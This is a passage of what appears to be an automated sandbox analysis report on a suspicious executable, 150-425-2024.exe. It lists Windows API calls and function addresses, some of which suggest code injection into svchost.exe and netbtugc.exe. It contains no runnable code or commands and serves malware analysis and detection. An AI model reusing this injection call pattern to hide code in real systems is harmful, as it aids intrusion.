Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_032E2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E35C0 NtCreateMutant,LdrInitializeThunk, 4_2_032E35C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E39B0 NtGetContextThread,LdrInitializeThunk, 4_2_032E39B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2B80 NtQueryInformationFile, 4_2_032E2B80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2AB0 NtWaitForSingleObject, 4_2_032E2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2F60 NtCreateProcessEx, 4_2_032E2F60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2FA0 NtQuerySection, 4_2_032E2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2F90 NtProtectVirtualMemory, 4_2_032E2F90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2E30 NtWriteVirtualMemory, 4_2_032E2E30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2EA0 NtAdjustPrivilegesToken, 4_2_032E2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2D00 NtSetInformationFile, 4_2_032E2D00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2DB0 NtEnumerateKey, 4_2_032E2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2C00 NtQueryInformationProcess, 4_2_032E2C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2CF0 NtOpenProcess, 4_2_032E2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2CC0 NtQueryVirtualMemory, 4_2_032E2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E3010 NtOpenDirectoryObject, 4_2_032E3010
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E3090 NtSetValueKey, 4_2_032E3090
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E3D10 NtOpenProcessToken, 4_2_032E3D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E3D70 NtOpenThread, 4_2_032E3D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A27920 NtCreateFile, 4_2_00A27920
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A27A70 NtReadFile, 4_2_00A27A70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A27BE0 NtClose, 4_2_00A27BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A27B50 NtDeleteFile, 4_2_00A27B50
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A27D30 NtAllocateVirtualMemory, 4_2_00A27D30
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle, 0_2_00C240B1
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C18858
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00C2545F
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BCE800 0_2_00BCE800
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BEDBB5 0_2_00BEDBB5
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C4804A 0_2_00C4804A
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BCE060 0_2_00BCE060
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD4140 0_2_00BD4140
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE2405 0_2_00BE2405
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF6522 0_2_00BF6522
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C40665 0_2_00C40665
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF267E 0_2_00BF267E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE283A 0_2_00BE283A
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD6843 0_2_00BD6843
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF89DF 0_2_00BF89DF
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C40AE2 0_2_00C40AE2
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF6A94 0_2_00BF6A94
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD8A0E 0_2_00BD8A0E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C1EB07 0_2_00C1EB07
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C28B13 0_2_00C28B13
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BECD61 0_2_00BECD61
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF7006 0_2_00BF7006
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD3190 0_2_00BD3190
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD710E 0_2_00BD710E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC1287 0_2_00BC1287
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE33C7 0_2_00BE33C7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BEF419 0_2_00BEF419
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD5680 0_2_00BD5680
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE16C4 0_2_00BE16C4
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE78D3 0_2_00BE78D3
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BD58C0 0_2_00BD58C0
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE1BB8 0_2_00BE1BB8
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF9D05 0_2_00BF9D05
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BCFE40 0_2_00BCFE40
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BEBFE6 0_2_00BEBFE6
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE1FD0 0_2_00BE1FD0
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_038D3670 0_2_038D3670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00616871 2_2_00616871
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00616873 2_2_00616873
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_006028A0 2_2_006028A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00610173 2_2_00610173
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00601110 2_2_00601110
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0060E1F3 2_2_0060E1F3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00601290 2_2_00601290
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00603500 2_2_00603500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_006026A0 2_2_006026A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0060268A 2_2_0060268A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00602698 2_2_00602698
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0060FF4A 2_2_0060FF4A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0062D753 2_2_0062D753
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0060FF53 2_2_0060FF53
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FA352 2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E3F0 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033003E6 2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C02C0 2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230100 2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DA118 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C8158 2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F41A2 2_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033001AA 2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F81CC 2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240770 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03264750 2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323C7C0 2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325C6E0 2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240535 2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03300591 2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E4420 2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F2446 2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EE4F6 2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FAB40 2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F6BD7 2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323EA80 2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03256962 2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032429A0 2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0330A9A6 2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324A840 2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03242840 2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032268B8 2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E8F0 2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03282F28 2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03260F30 2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E2F30 2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B4F40 2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032BEFA0 2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324CFE0 2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03232FC8 2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FEE26 2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240E59 2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03252E90 2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FCE93 2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FEEDB 2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324AD00 2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DCD1F 2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03258DBF 2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323ADE0 2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03240C00 2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0CB5 2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03230CF2 2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F132D 2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322D34C 2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0328739A 2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032452A0 2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E12ED 2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325B2C0 2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327516C 2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322F172 2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0330B16B 2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324B1B0 2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F70E9 2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FF0E0 2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EF0CC 2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032470C0 2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FF7B0 2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F16CC 2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F7571 2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DD5B0 2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FF43F 2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03231460 2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FFB76 2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325FB80 2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B5BF0 2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327DBF9 2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B3A6C 2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FFA49 2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F7A46 2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DDAAC 2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03285AA0 2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E1AA3 2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EDAC6 2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D5910 2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03249950 2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325B950 2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AD800 2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032438E0 2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FFF09 2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FFFB1 2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03241F92 2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03203FD2 2_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03203FD5 2_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03249EB0 2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F7D73 2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03243D40 2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F1D5A 2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325FDC0 2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B9C32 2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FFCF2 2_2_032FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336A352 4_2_0336A352
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033703E6 4_2_033703E6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032BE3F0 4_2_032BE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03350274 4_2_03350274
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033302C0 4_2_033302C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032A0100 4_2_032A0100
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0334A118 4_2_0334A118
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03338158 4_2_03338158
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033701AA 4_2_033701AA
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033681CC 4_2_033681CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03342000 4_2_03342000
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B0770 4_2_032B0770
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032D4750 4_2_032D4750
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032AC7C0 4_2_032AC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032CC6E0 4_2_032CC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B0535 4_2_032B0535
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03370591 4_2_03370591
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03362446 4_2_03362446
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0335E4F6 4_2_0335E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336AB40 4_2_0336AB40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03366BD7 4_2_03366BD7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032AEA80 4_2_032AEA80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032C6962 4_2_032C6962
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B29A0 4_2_032B29A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0337A9A6 4_2_0337A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032BA840 4_2_032BA840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B2840 4_2_032B2840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032968B8 4_2_032968B8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032DE8F0 4_2_032DE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032F2F28 4_2_032F2F28
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032D0F30 4_2_032D0F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03324F40 4_2_03324F40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0332EFA0 4_2_0332EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032BCFE0 4_2_032BCFE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032A2FC8 4_2_032A2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336EE26 4_2_0336EE26
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B0E59 4_2_032B0E59
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336CE93 4_2_0336CE93
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032C2E90 4_2_032C2E90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336EEDB 4_2_0336EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032BAD00 4_2_032BAD00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0334CD1F 4_2_0334CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032C8DBF 4_2_032C8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032AADE0 4_2_032AADE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B0C00 4_2_032B0C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03350CB5 4_2_03350CB5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032A0CF2 4_2_032A0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336132D 4_2_0336132D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0329D34C 4_2_0329D34C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032F739A 4_2_032F739A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B52A0 4_2_032B52A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033512ED 4_2_033512ED
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032CB2C0 4_2_032CB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E516C 4_2_032E516C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0329F172 4_2_0329F172
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0337B16B 4_2_0337B16B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032BB1B0 4_2_032BB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336F0E0 4_2_0336F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033670E9 4_2_033670E9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B70C0 4_2_032B70C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0335F0CC 4_2_0335F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336F7B0 4_2_0336F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_033616CC 4_2_033616CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03367571 4_2_03367571
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0334D5B0 4_2_0334D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336F43F 4_2_0336F43F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032A1460 4_2_032A1460
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336FB76 4_2_0336FB76
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032CFB80 4_2_032CFB80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03325BF0 4_2_03325BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032EDBF9 4_2_032EDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03323A6C 4_2_03323A6C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03367A46 4_2_03367A46
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336FA49 4_2_0336FA49
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032F5AA0 4_2_032F5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0334DAAC 4_2_0334DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0335DAC6 4_2_0335DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03345910 4_2_03345910
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B9950 4_2_032B9950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032CB950 4_2_032CB950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0331D800 4_2_0331D800
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B38E0 4_2_032B38E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336FF09 4_2_0336FF09
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336FFB1 4_2_0336FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B1F92 4_2_032B1F92
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B9EB0 4_2_032B9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03367D73 4_2_03367D73
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032B3D40 4_2_032B3D40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03361D5A 4_2_03361D5A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032CFDC0 4_2_032CFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_03329C32 4_2_03329C32
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0336FCF2 4_2_0336FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A115E0 4_2_00A115E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A130EE 4_2_00A130EE
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A130F0 4_2_00A130F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A0C7C7 4_2_00A0C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A0C7D0 4_2_00A0C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A0C9F0 4_2_00A0C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A0AA70 4_2_00A0AA70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A29FD0 4_2_00A29FD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03287E54 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0331EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0329B970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 032F7E54 appears 100 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0332F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 032E5130 appears 58 times
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: String function: 00BE8B40 appears 42 times
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: String function: 00BC7F41 appears 35 times
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: String function: 00BE0D27 appears 70 times
Source: 150-425-2024.exe, 00000000.00000003.1442616568.0000000003F53000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 150-425-2024.exe
Source: 150-425-2024.exe, 00000000.00000003.1447380115.000000000414D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 150-425-2024.exe
Source: 150-425-2024.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
